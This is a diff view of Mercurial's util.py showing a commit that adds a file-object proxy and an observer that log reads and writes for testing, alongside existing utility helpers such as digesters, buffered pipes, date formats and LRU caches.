##// END OF EJS Templates
util: add a file object proxy that can notify observers...
Gregory Szorc -
r36541:bfe38f78 default
parent child Browse files
Show More
@@ -1,4013 +1,4235 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import io
30 30 import itertools
31 31 import mmap
32 32 import os
33 33 import platform as pyplatform
34 34 import re as remod
35 35 import shutil
36 36 import signal
37 37 import socket
38 38 import stat
39 39 import string
40 40 import subprocess
41 41 import sys
42 42 import tempfile
43 43 import textwrap
44 44 import time
45 45 import traceback
46 46 import warnings
47 47 import zlib
48 48
49 49 from . import (
50 50 encoding,
51 51 error,
52 52 i18n,
53 53 node as nodemod,
54 54 policy,
55 55 pycompat,
56 56 urllibcompat,
57 57 )
58 58
59 59 base85 = policy.importmod(r'base85')
60 60 osutil = policy.importmod(r'osutil')
61 61 parsers = policy.importmod(r'parsers')
62 62
63 63 b85decode = base85.b85decode
64 64 b85encode = base85.b85encode
65 65
66 66 cookielib = pycompat.cookielib
67 67 empty = pycompat.empty
68 68 httplib = pycompat.httplib
69 69 pickle = pycompat.pickle
70 70 queue = pycompat.queue
71 71 socketserver = pycompat.socketserver
72 72 stderr = pycompat.stderr
73 73 stdin = pycompat.stdin
74 74 stdout = pycompat.stdout
75 75 stringio = pycompat.stringio
76 76 xmlrpclib = pycompat.xmlrpclib
77 77
78 78 httpserver = urllibcompat.httpserver
79 79 urlerr = urllibcompat.urlerr
80 80 urlreq = urllibcompat.urlreq
81 81
82 82 # workaround for win32mbcs
83 83 _filenamebytestr = pycompat.bytestr
84 84
85 85 def isatty(fp):
86 86 try:
87 87 return fp.isatty()
88 88 except AttributeError:
89 89 return False
90 90
91 91 # glibc determines buffering on first write to stdout - if we replace a TTY
92 92 # destined stdout with a pipe destined stdout (e.g. pager), we want line
93 93 # buffering
94 94 if isatty(stdout):
95 95 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
96 96
97 97 if pycompat.iswindows:
98 98 from . import windows as platform
99 99 stdout = platform.winstdout(stdout)
100 100 else:
101 101 from . import posix as platform
102 102
103 103 _ = i18n._
104 104
105 105 bindunixsocket = platform.bindunixsocket
106 106 cachestat = platform.cachestat
107 107 checkexec = platform.checkexec
108 108 checklink = platform.checklink
109 109 copymode = platform.copymode
110 110 executablepath = platform.executablepath
111 111 expandglobs = platform.expandglobs
112 112 explainexit = platform.explainexit
113 113 findexe = platform.findexe
114 114 getfsmountpoint = platform.getfsmountpoint
115 115 getfstype = platform.getfstype
116 116 gethgcmd = platform.gethgcmd
117 117 getuser = platform.getuser
118 118 getpid = os.getpid
119 119 groupmembers = platform.groupmembers
120 120 groupname = platform.groupname
121 121 hidewindow = platform.hidewindow
122 122 isexec = platform.isexec
123 123 isowner = platform.isowner
124 124 listdir = osutil.listdir
125 125 localpath = platform.localpath
126 126 lookupreg = platform.lookupreg
127 127 makedir = platform.makedir
128 128 nlinks = platform.nlinks
129 129 normpath = platform.normpath
130 130 normcase = platform.normcase
131 131 normcasespec = platform.normcasespec
132 132 normcasefallback = platform.normcasefallback
133 133 openhardlinks = platform.openhardlinks
134 134 oslink = platform.oslink
135 135 parsepatchoutput = platform.parsepatchoutput
136 136 pconvert = platform.pconvert
137 137 poll = platform.poll
138 138 popen = platform.popen
139 139 posixfile = platform.posixfile
140 140 quotecommand = platform.quotecommand
141 141 readpipe = platform.readpipe
142 142 rename = platform.rename
143 143 removedirs = platform.removedirs
144 144 samedevice = platform.samedevice
145 145 samefile = platform.samefile
146 146 samestat = platform.samestat
147 147 setbinary = platform.setbinary
148 148 setflags = platform.setflags
149 149 setsignalhandler = platform.setsignalhandler
150 150 shellquote = platform.shellquote
151 151 shellsplit = platform.shellsplit
152 152 spawndetached = platform.spawndetached
153 153 split = platform.split
154 154 sshargs = platform.sshargs
155 155 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
156 156 statisexec = platform.statisexec
157 157 statislink = platform.statislink
158 158 testpid = platform.testpid
159 159 umask = platform.umask
160 160 unlink = platform.unlink
161 161 username = platform.username
162 162
163 163 try:
164 164 recvfds = osutil.recvfds
165 165 except AttributeError:
166 166 pass
167 167 try:
168 168 setprocname = osutil.setprocname
169 169 except AttributeError:
170 170 pass
171 171 try:
172 172 unblocksignal = osutil.unblocksignal
173 173 except AttributeError:
174 174 pass
175 175
176 176 # Python compatibility
177 177
178 178 _notset = object()
179 179
180 180 # disable Python's problematic floating point timestamps (issue4836)
181 181 # (Python hypocritically says you shouldn't change this behavior in
182 182 # libraries, and sure enough Mercurial is not a library.)
183 183 os.stat_float_times(False)
184 184
185 185 def safehasattr(thing, attr):
186 186 return getattr(thing, attr, _notset) is not _notset
187 187
188 188 def _rapply(f, xs):
189 189 if xs is None:
190 190 # assume None means non-value of optional data
191 191 return xs
192 192 if isinstance(xs, (list, set, tuple)):
193 193 return type(xs)(_rapply(f, x) for x in xs)
194 194 if isinstance(xs, dict):
195 195 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
196 196 return f(xs)
197 197
198 198 def rapply(f, xs):
199 199 """Apply function recursively to every item preserving the data structure
200 200
201 201 >>> def f(x):
202 202 ... return 'f(%s)' % x
203 203 >>> rapply(f, None) is None
204 204 True
205 205 >>> rapply(f, 'a')
206 206 'f(a)'
207 207 >>> rapply(f, {'a'}) == {'f(a)'}
208 208 True
209 209 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
210 210 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
211 211
212 212 >>> xs = [object()]
213 213 >>> rapply(pycompat.identity, xs) is xs
214 214 True
215 215 """
216 216 if f is pycompat.identity:
217 217 # fast path mainly for py2
218 218 return xs
219 219 return _rapply(f, xs)
220 220
221 221 def bytesinput(fin, fout, *args, **kwargs):
222 222 sin, sout = sys.stdin, sys.stdout
223 223 try:
224 224 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
225 225 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
226 226 finally:
227 227 sys.stdin, sys.stdout = sin, sout
228 228
229 229 def bitsfrom(container):
230 230 bits = 0
231 231 for bit in container:
232 232 bits |= bit
233 233 return bits
234 234
235 235 # python 2.6 still have deprecation warning enabled by default. We do not want
236 236 # to display anything to standard user so detect if we are running test and
237 237 # only use python deprecation warning in this case.
238 238 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
239 239 if _dowarn:
240 240 # explicitly unfilter our warning for python 2.7
241 241 #
242 242 # The option of setting PYTHONWARNINGS in the test runner was investigated.
243 243 # However, module name set through PYTHONWARNINGS was exactly matched, so
244 244 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
245 245 # makes the whole PYTHONWARNINGS thing useless for our usecase.
246 246 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
247 247 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
248 248 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
249 249
250 250 def nouideprecwarn(msg, version, stacklevel=1):
251 251 """Issue an python native deprecation warning
252 252
253 253 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
254 254 """
255 255 if _dowarn:
256 256 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
257 257 " update your code.)") % version
258 258 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
259 259
260 260 DIGESTS = {
261 261 'md5': hashlib.md5,
262 262 'sha1': hashlib.sha1,
263 263 'sha512': hashlib.sha512,
264 264 }
265 265 # List of digest types from strongest to weakest
266 266 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
267 267
268 268 for k in DIGESTS_BY_STRENGTH:
269 269 assert k in DIGESTS
270 270
271 271 class digester(object):
272 272 """helper to compute digests.
273 273
274 274 This helper can be used to compute one or more digests given their name.
275 275
276 276 >>> d = digester([b'md5', b'sha1'])
277 277 >>> d.update(b'foo')
278 278 >>> [k for k in sorted(d)]
279 279 ['md5', 'sha1']
280 280 >>> d[b'md5']
281 281 'acbd18db4cc2f85cedef654fccc4a4d8'
282 282 >>> d[b'sha1']
283 283 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
284 284 >>> digester.preferred([b'md5', b'sha1'])
285 285 'sha1'
286 286 """
287 287
288 288 def __init__(self, digests, s=''):
289 289 self._hashes = {}
290 290 for k in digests:
291 291 if k not in DIGESTS:
292 292 raise Abort(_('unknown digest type: %s') % k)
293 293 self._hashes[k] = DIGESTS[k]()
294 294 if s:
295 295 self.update(s)
296 296
297 297 def update(self, data):
298 298 for h in self._hashes.values():
299 299 h.update(data)
300 300
301 301 def __getitem__(self, key):
302 302 if key not in DIGESTS:
303 303 raise Abort(_('unknown digest type: %s') % k)
304 304 return nodemod.hex(self._hashes[key].digest())
305 305
306 306 def __iter__(self):
307 307 return iter(self._hashes)
308 308
309 309 @staticmethod
310 310 def preferred(supported):
311 311 """returns the strongest digest type in both supported and DIGESTS."""
312 312
313 313 for k in DIGESTS_BY_STRENGTH:
314 314 if k in supported:
315 315 return k
316 316 return None
317 317
318 318 class digestchecker(object):
319 319 """file handle wrapper that additionally checks content against a given
320 320 size and digests.
321 321
322 322 d = digestchecker(fh, size, {'md5': '...'})
323 323
324 324 When multiple digests are given, all of them are validated.
325 325 """
326 326
327 327 def __init__(self, fh, size, digests):
328 328 self._fh = fh
329 329 self._size = size
330 330 self._got = 0
331 331 self._digests = dict(digests)
332 332 self._digester = digester(self._digests.keys())
333 333
334 334 def read(self, length=-1):
335 335 content = self._fh.read(length)
336 336 self._digester.update(content)
337 337 self._got += len(content)
338 338 return content
339 339
340 340 def validate(self):
341 341 if self._size != self._got:
342 342 raise Abort(_('size mismatch: expected %d, got %d') %
343 343 (self._size, self._got))
344 344 for k, v in self._digests.items():
345 345 if v != self._digester[k]:
346 346 # i18n: first parameter is a digest name
347 347 raise Abort(_('%s mismatch: expected %s, got %s') %
348 348 (k, v, self._digester[k]))
349 349
350 350 try:
351 351 buffer = buffer
352 352 except NameError:
353 353 def buffer(sliceable, offset=0, length=None):
354 354 if length is not None:
355 355 return memoryview(sliceable)[offset:offset + length]
356 356 return memoryview(sliceable)[offset:]
357 357
358 358 closefds = pycompat.isposix
359 359
360 360 _chunksize = 4096
361 361
362 362 class bufferedinputpipe(object):
363 363 """a manually buffered input pipe
364 364
365 365 Python will not let us use buffered IO and lazy reading with 'polling' at
366 366 the same time. We cannot probe the buffer state and select will not detect
367 367 that data are ready to read if they are already buffered.
368 368
369 369 This class let us work around that by implementing its own buffering
370 370 (allowing efficient readline) while offering a way to know if the buffer is
371 371 empty from the output (allowing collaboration of the buffer with polling).
372 372
373 373 This class lives in the 'util' module because it makes use of the 'os'
374 374 module from the python stdlib.
375 375 """
376 376
377 377 def __init__(self, input):
378 378 self._input = input
379 379 self._buffer = []
380 380 self._eof = False
381 381 self._lenbuf = 0
382 382
383 383 @property
384 384 def hasbuffer(self):
385 385 """True is any data is currently buffered
386 386
387 387 This will be used externally a pre-step for polling IO. If there is
388 388 already data then no polling should be set in place."""
389 389 return bool(self._buffer)
390 390
391 391 @property
392 392 def closed(self):
393 393 return self._input.closed
394 394
395 395 def fileno(self):
396 396 return self._input.fileno()
397 397
398 398 def close(self):
399 399 return self._input.close()
400 400
401 401 def read(self, size):
402 402 while (not self._eof) and (self._lenbuf < size):
403 403 self._fillbuffer()
404 404 return self._frombuffer(size)
405 405
406 406 def readline(self, *args, **kwargs):
407 407 if 1 < len(self._buffer):
408 408 # this should not happen because both read and readline end with a
409 409 # _frombuffer call that collapse it.
410 410 self._buffer = [''.join(self._buffer)]
411 411 self._lenbuf = len(self._buffer[0])
412 412 lfi = -1
413 413 if self._buffer:
414 414 lfi = self._buffer[-1].find('\n')
415 415 while (not self._eof) and lfi < 0:
416 416 self._fillbuffer()
417 417 if self._buffer:
418 418 lfi = self._buffer[-1].find('\n')
419 419 size = lfi + 1
420 420 if lfi < 0: # end of file
421 421 size = self._lenbuf
422 422 elif 1 < len(self._buffer):
423 423 # we need to take previous chunks into account
424 424 size += self._lenbuf - len(self._buffer[-1])
425 425 return self._frombuffer(size)
426 426
427 427 def _frombuffer(self, size):
428 428 """return at most 'size' data from the buffer
429 429
430 430 The data are removed from the buffer."""
431 431 if size == 0 or not self._buffer:
432 432 return ''
433 433 buf = self._buffer[0]
434 434 if 1 < len(self._buffer):
435 435 buf = ''.join(self._buffer)
436 436
437 437 data = buf[:size]
438 438 buf = buf[len(data):]
439 439 if buf:
440 440 self._buffer = [buf]
441 441 self._lenbuf = len(buf)
442 442 else:
443 443 self._buffer = []
444 444 self._lenbuf = 0
445 445 return data
446 446
447 447 def _fillbuffer(self):
448 448 """read data to the buffer"""
449 449 data = os.read(self._input.fileno(), _chunksize)
450 450 if not data:
451 451 self._eof = True
452 452 else:
453 453 self._lenbuf += len(data)
454 454 self._buffer.append(data)
455 455
456 456 def mmapread(fp):
457 457 try:
458 458 fd = getattr(fp, 'fileno', lambda: fp)()
459 459 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
460 460 except ValueError:
461 461 # Empty files cannot be mmapped, but mmapread should still work. Check
462 462 # if the file is empty, and if so, return an empty buffer.
463 463 if os.fstat(fd).st_size == 0:
464 464 return ''
465 465 raise
466 466
467 467 def popen2(cmd, env=None, newlines=False):
468 468 # Setting bufsize to -1 lets the system decide the buffer size.
469 469 # The default for bufsize is 0, meaning unbuffered. This leads to
470 470 # poor performance on Mac OS X: http://bugs.python.org/issue4194
471 471 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
472 472 close_fds=closefds,
473 473 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
474 474 universal_newlines=newlines,
475 475 env=env)
476 476 return p.stdin, p.stdout
477 477
478 478 def popen3(cmd, env=None, newlines=False):
479 479 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
480 480 return stdin, stdout, stderr
481 481
482 482 def popen4(cmd, env=None, newlines=False, bufsize=-1):
483 483 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
484 484 close_fds=closefds,
485 485 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
486 486 stderr=subprocess.PIPE,
487 487 universal_newlines=newlines,
488 488 env=env)
489 489 return p.stdin, p.stdout, p.stderr, p
490 490
491 class fileobjectproxy(object):
492 """A proxy around file objects that tells a watcher when events occur.
493
494 This type is intended to only be used for testing purposes. Think hard
495 before using it in important code.
496 """
497 __slots__ = (
498 r'_orig',
499 r'_observer',
500 )
501
502 def __init__(self, fh, observer):
503 object.__setattr__(self, '_orig', fh)
504 object.__setattr__(self, '_observer', observer)
505
506 def __getattribute__(self, name):
507 ours = {
508 # IOBase
509 r'close',
510 # closed if a property
511 r'fileno',
512 r'flush',
513 r'isatty',
514 r'readable',
515 r'readline',
516 r'readlines',
517 r'seek',
518 r'seekable',
519 r'tell',
520 r'truncate',
521 r'writable',
522 r'writelines',
523 # RawIOBase
524 r'read',
525 r'readall',
526 r'readinto',
527 r'write',
528 # BufferedIOBase
529 # raw is a property
530 r'detach',
531 # read defined above
532 r'read1',
533 # readinto defined above
534 # write defined above
535 }
536
537 # We only observe some methods.
538 if name in ours:
539 return object.__getattribute__(self, name)
540
541 return getattr(object.__getattribute__(self, r'_orig'), name)
542
543 def __delattr__(self, name):
544 return delattr(object.__getattribute__(self, r'_orig'), name)
545
546 def __setattr__(self, name, value):
547 return setattr(object.__getattribute__(self, r'_orig'), name, value)
548
549 def __iter__(self):
550 return object.__getattribute__(self, r'_orig').__iter__()
551
552 def _observedcall(self, name, *args, **kwargs):
553 # Call the original object.
554 orig = object.__getattribute__(self, r'_orig')
555 res = getattr(orig, name)(*args, **kwargs)
556
557 # Call a method on the observer of the same name with arguments
558 # so it can react, log, etc.
559 observer = object.__getattribute__(self, r'_observer')
560 fn = getattr(observer, name, None)
561 if fn:
562 fn(res, *args, **kwargs)
563
564 return res
565
566 def close(self, *args, **kwargs):
567 return object.__getattribute__(self, r'_observedcall')(
568 r'close', *args, **kwargs)
569
570 def fileno(self, *args, **kwargs):
571 return object.__getattribute__(self, r'_observedcall')(
572 r'fileno', *args, **kwargs)
573
574 def flush(self, *args, **kwargs):
575 return object.__getattribute__(self, r'_observedcall')(
576 r'flush', *args, **kwargs)
577
578 def isatty(self, *args, **kwargs):
579 return object.__getattribute__(self, r'_observedcall')(
580 r'isatty', *args, **kwargs)
581
582 def readable(self, *args, **kwargs):
583 return object.__getattribute__(self, r'_observedcall')(
584 r'readable', *args, **kwargs)
585
586 def readline(self, *args, **kwargs):
587 return object.__getattribute__(self, r'_observedcall')(
588 r'readline', *args, **kwargs)
589
590 def readlines(self, *args, **kwargs):
591 return object.__getattribute__(self, r'_observedcall')(
592 r'readlines', *args, **kwargs)
593
594 def seek(self, *args, **kwargs):
595 return object.__getattribute__(self, r'_observedcall')(
596 r'seek', *args, **kwargs)
597
598 def seekable(self, *args, **kwargs):
599 return object.__getattribute__(self, r'_observedcall')(
600 r'seekable', *args, **kwargs)
601
602 def tell(self, *args, **kwargs):
603 return object.__getattribute__(self, r'_observedcall')(
604 r'tell', *args, **kwargs)
605
606 def truncate(self, *args, **kwargs):
607 return object.__getattribute__(self, r'_observedcall')(
608 r'truncate', *args, **kwargs)
609
610 def writable(self, *args, **kwargs):
611 return object.__getattribute__(self, r'_observedcall')(
612 r'writable', *args, **kwargs)
613
614 def writelines(self, *args, **kwargs):
615 return object.__getattribute__(self, r'_observedcall')(
616 r'writelines', *args, **kwargs)
617
618 def read(self, *args, **kwargs):
619 return object.__getattribute__(self, r'_observedcall')(
620 r'read', *args, **kwargs)
621
622 def readall(self, *args, **kwargs):
623 return object.__getattribute__(self, r'_observedcall')(
624 r'readall', *args, **kwargs)
625
626 def readinto(self, *args, **kwargs):
627 return object.__getattribute__(self, r'_observedcall')(
628 r'readinto', *args, **kwargs)
629
630 def write(self, *args, **kwargs):
631 return object.__getattribute__(self, r'_observedcall')(
632 r'write', *args, **kwargs)
633
634 def detach(self, *args, **kwargs):
635 return object.__getattribute__(self, r'_observedcall')(
636 r'detach', *args, **kwargs)
637
638 def read1(self, *args, **kwargs):
639 return object.__getattribute__(self, r'_observedcall')(
640 r'read1', *args, **kwargs)
641
642 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
643 DATA_ESCAPE_MAP.update({
644 b'\\': b'\\\\',
645 b'\r': br'\r',
646 b'\n': br'\n',
647 })
648 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
649
650 def escapedata(s):
651 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
652
653 class fileobjectobserver(object):
654 """Logs file object activity."""
655 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
656 self.fh = fh
657 self.name = name
658 self.logdata = logdata
659 self.reads = reads
660 self.writes = writes
661
662 def _writedata(self, data):
663 if not self.logdata:
664 self.fh.write('\n')
665 return
666
667 # Simple case writes all data on a single line.
668 if b'\n' not in data:
669 self.fh.write(': %s\n' % escapedata(data))
670 return
671
672 # Data with newlines is written to multiple lines.
673 self.fh.write(':\n')
674 lines = data.splitlines(True)
675 for line in lines:
676 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
677
678 def read(self, res, size=-1):
679 if not self.reads:
680 return
681
682 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
683 self._writedata(res)
684
685 def readline(self, res, limit=-1):
686 if not self.reads:
687 return
688
689 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
690 self._writedata(res)
691
692 def write(self, res, data):
693 if not self.writes:
694 return
695
696 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
697 self._writedata(data)
698
699 def flush(self, res):
700 if not self.writes:
701 return
702
703 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
704
705 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
706 logdata=False):
707 """Turn a file object into a logging file object."""
708
709 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
710 logdata=logdata)
711 return fileobjectproxy(fh, observer)
712
491 713 def version():
492 714 """Return version information if available."""
493 715 try:
494 716 from . import __version__
495 717 return __version__.version
496 718 except ImportError:
497 719 return 'unknown'
498 720
499 721 def versiontuple(v=None, n=4):
500 722 """Parses a Mercurial version string into an N-tuple.
501 723
502 724 The version string to be parsed is specified with the ``v`` argument.
503 725 If it isn't defined, the current Mercurial version string will be parsed.
504 726
505 727 ``n`` can be 2, 3, or 4. Here is how some version strings map to
506 728 returned values:
507 729
508 730 >>> v = b'3.6.1+190-df9b73d2d444'
509 731 >>> versiontuple(v, 2)
510 732 (3, 6)
511 733 >>> versiontuple(v, 3)
512 734 (3, 6, 1)
513 735 >>> versiontuple(v, 4)
514 736 (3, 6, 1, '190-df9b73d2d444')
515 737
516 738 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
517 739 (3, 6, 1, '190-df9b73d2d444+20151118')
518 740
519 741 >>> v = b'3.6'
520 742 >>> versiontuple(v, 2)
521 743 (3, 6)
522 744 >>> versiontuple(v, 3)
523 745 (3, 6, None)
524 746 >>> versiontuple(v, 4)
525 747 (3, 6, None, None)
526 748
527 749 >>> v = b'3.9-rc'
528 750 >>> versiontuple(v, 2)
529 751 (3, 9)
530 752 >>> versiontuple(v, 3)
531 753 (3, 9, None)
532 754 >>> versiontuple(v, 4)
533 755 (3, 9, None, 'rc')
534 756
535 757 >>> v = b'3.9-rc+2-02a8fea4289b'
536 758 >>> versiontuple(v, 2)
537 759 (3, 9)
538 760 >>> versiontuple(v, 3)
539 761 (3, 9, None)
540 762 >>> versiontuple(v, 4)
541 763 (3, 9, None, 'rc+2-02a8fea4289b')
542 764 """
543 765 if not v:
544 766 v = version()
545 767 parts = remod.split('[\+-]', v, 1)
546 768 if len(parts) == 1:
547 769 vparts, extra = parts[0], None
548 770 else:
549 771 vparts, extra = parts
550 772
551 773 vints = []
552 774 for i in vparts.split('.'):
553 775 try:
554 776 vints.append(int(i))
555 777 except ValueError:
556 778 break
557 779 # (3, 6) -> (3, 6, None)
558 780 while len(vints) < 3:
559 781 vints.append(None)
560 782
561 783 if n == 2:
562 784 return (vints[0], vints[1])
563 785 if n == 3:
564 786 return (vints[0], vints[1], vints[2])
565 787 if n == 4:
566 788 return (vints[0], vints[1], vints[2], extra)
567 789
568 790 # used by parsedate
569 791 defaultdateformats = (
570 792 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
571 793 '%Y-%m-%dT%H:%M', # without seconds
572 794 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
573 795 '%Y-%m-%dT%H%M', # without seconds
574 796 '%Y-%m-%d %H:%M:%S', # our common legal variant
575 797 '%Y-%m-%d %H:%M', # without seconds
576 798 '%Y-%m-%d %H%M%S', # without :
577 799 '%Y-%m-%d %H%M', # without seconds
578 800 '%Y-%m-%d %I:%M:%S%p',
579 801 '%Y-%m-%d %H:%M',
580 802 '%Y-%m-%d %I:%M%p',
581 803 '%Y-%m-%d',
582 804 '%m-%d',
583 805 '%m/%d',
584 806 '%m/%d/%y',
585 807 '%m/%d/%Y',
586 808 '%a %b %d %H:%M:%S %Y',
587 809 '%a %b %d %I:%M:%S%p %Y',
588 810 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
589 811 '%b %d %H:%M:%S %Y',
590 812 '%b %d %I:%M:%S%p %Y',
591 813 '%b %d %H:%M:%S',
592 814 '%b %d %I:%M:%S%p',
593 815 '%b %d %H:%M',
594 816 '%b %d %I:%M%p',
595 817 '%b %d %Y',
596 818 '%b %d',
597 819 '%H:%M:%S',
598 820 '%I:%M:%S%p',
599 821 '%H:%M',
600 822 '%I:%M%p',
601 823 )
602 824
603 825 extendeddateformats = defaultdateformats + (
604 826 "%Y",
605 827 "%Y-%m",
606 828 "%b",
607 829 "%b %Y",
608 830 )
609 831
610 832 def cachefunc(func):
611 833 '''cache the result of function calls'''
612 834 # XXX doesn't handle keywords args
613 835 if func.__code__.co_argcount == 0:
614 836 cache = []
615 837 def f():
616 838 if len(cache) == 0:
617 839 cache.append(func())
618 840 return cache[0]
619 841 return f
620 842 cache = {}
621 843 if func.__code__.co_argcount == 1:
622 844 # we gain a small amount of time because
623 845 # we don't need to pack/unpack the list
624 846 def f(arg):
625 847 if arg not in cache:
626 848 cache[arg] = func(arg)
627 849 return cache[arg]
628 850 else:
629 851 def f(*args):
630 852 if args not in cache:
631 853 cache[args] = func(*args)
632 854 return cache[args]
633 855
634 856 return f
635 857
636 858 class cow(object):
637 859 """helper class to make copy-on-write easier
638 860
639 861 Call preparewrite before doing any writes.
640 862 """
641 863
642 864 def preparewrite(self):
643 865 """call this before writes, return self or a copied new object"""
644 866 if getattr(self, '_copied', 0):
645 867 self._copied -= 1
646 868 return self.__class__(self)
647 869 return self
648 870
649 871 def copy(self):
650 872 """always do a cheap copy"""
651 873 self._copied = getattr(self, '_copied', 0) + 1
652 874 return self
653 875
654 876 class sortdict(collections.OrderedDict):
655 877 '''a simple sorted dictionary
656 878
657 879 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
658 880 >>> d2 = d1.copy()
659 881 >>> d2
660 882 sortdict([('a', 0), ('b', 1)])
661 883 >>> d2.update([(b'a', 2)])
662 884 >>> list(d2.keys()) # should still be in last-set order
663 885 ['b', 'a']
664 886 '''
665 887
666 888 def __setitem__(self, key, value):
667 889 if key in self:
668 890 del self[key]
669 891 super(sortdict, self).__setitem__(key, value)
670 892
671 893 if pycompat.ispypy:
672 894 # __setitem__() isn't called as of PyPy 5.8.0
673 895 def update(self, src):
674 896 if isinstance(src, dict):
675 897 src = src.iteritems()
676 898 for k, v in src:
677 899 self[k] = v
678 900
679 901 class cowdict(cow, dict):
680 902 """copy-on-write dict
681 903
682 904 Be sure to call d = d.preparewrite() before writing to d.
683 905
684 906 >>> a = cowdict()
685 907 >>> a is a.preparewrite()
686 908 True
687 909 >>> b = a.copy()
688 910 >>> b is a
689 911 True
690 912 >>> c = b.copy()
691 913 >>> c is a
692 914 True
693 915 >>> a = a.preparewrite()
694 916 >>> b is a
695 917 False
696 918 >>> a is a.preparewrite()
697 919 True
698 920 >>> c = c.preparewrite()
699 921 >>> b is c
700 922 False
701 923 >>> b is b.preparewrite()
702 924 True
703 925 """
704 926
705 927 class cowsortdict(cow, sortdict):
706 928 """copy-on-write sortdict
707 929
708 930 Be sure to call d = d.preparewrite() before writing to d.
709 931 """
710 932
711 933 class transactional(object):
712 934 """Base class for making a transactional type into a context manager."""
713 935 __metaclass__ = abc.ABCMeta
714 936
715 937 @abc.abstractmethod
716 938 def close(self):
717 939 """Successfully closes the transaction."""
718 940
719 941 @abc.abstractmethod
720 942 def release(self):
721 943 """Marks the end of the transaction.
722 944
723 945 If the transaction has not been closed, it will be aborted.
724 946 """
725 947
726 948 def __enter__(self):
727 949 return self
728 950
729 951 def __exit__(self, exc_type, exc_val, exc_tb):
730 952 try:
731 953 if exc_type is None:
732 954 self.close()
733 955 finally:
734 956 self.release()
735 957
736 958 @contextlib.contextmanager
737 959 def acceptintervention(tr=None):
738 960 """A context manager that closes the transaction on InterventionRequired
739 961
740 962 If no transaction was provided, this simply runs the body and returns
741 963 """
742 964 if not tr:
743 965 yield
744 966 return
745 967 try:
746 968 yield
747 969 tr.close()
748 970 except error.InterventionRequired:
749 971 tr.close()
750 972 raise
751 973 finally:
752 974 tr.release()
753 975
754 976 @contextlib.contextmanager
755 977 def nullcontextmanager():
756 978 yield
757 979
758 980 class _lrucachenode(object):
759 981 """A node in a doubly linked list.
760 982
761 983 Holds a reference to nodes on either side as well as a key-value
762 984 pair for the dictionary entry.
763 985 """
764 986 __slots__ = (u'next', u'prev', u'key', u'value')
765 987
766 988 def __init__(self):
767 989 self.next = None
768 990 self.prev = None
769 991
770 992 self.key = _notset
771 993 self.value = None
772 994
773 995 def markempty(self):
774 996 """Mark the node as emptied."""
775 997 self.key = _notset
776 998
777 999 class lrucachedict(object):
778 1000 """Dict that caches most recent accesses and sets.
779 1001
780 1002 The dict consists of an actual backing dict - indexed by original
781 1003 key - and a doubly linked circular list defining the order of entries in
782 1004 the cache.
783 1005
784 1006 The head node is the newest entry in the cache. If the cache is full,
785 1007 we recycle head.prev and make it the new head. Cache accesses result in
786 1008 the node being moved to before the existing head and being marked as the
787 1009 new head node.
788 1010 """
789 1011 def __init__(self, max):
790 1012 self._cache = {}
791 1013
792 1014 self._head = head = _lrucachenode()
793 1015 head.prev = head
794 1016 head.next = head
795 1017 self._size = 1
796 1018 self._capacity = max
797 1019
798 1020 def __len__(self):
799 1021 return len(self._cache)
800 1022
801 1023 def __contains__(self, k):
802 1024 return k in self._cache
803 1025
804 1026 def __iter__(self):
805 1027 # We don't have to iterate in cache order, but why not.
806 1028 n = self._head
807 1029 for i in range(len(self._cache)):
808 1030 yield n.key
809 1031 n = n.next
810 1032
811 1033 def __getitem__(self, k):
812 1034 node = self._cache[k]
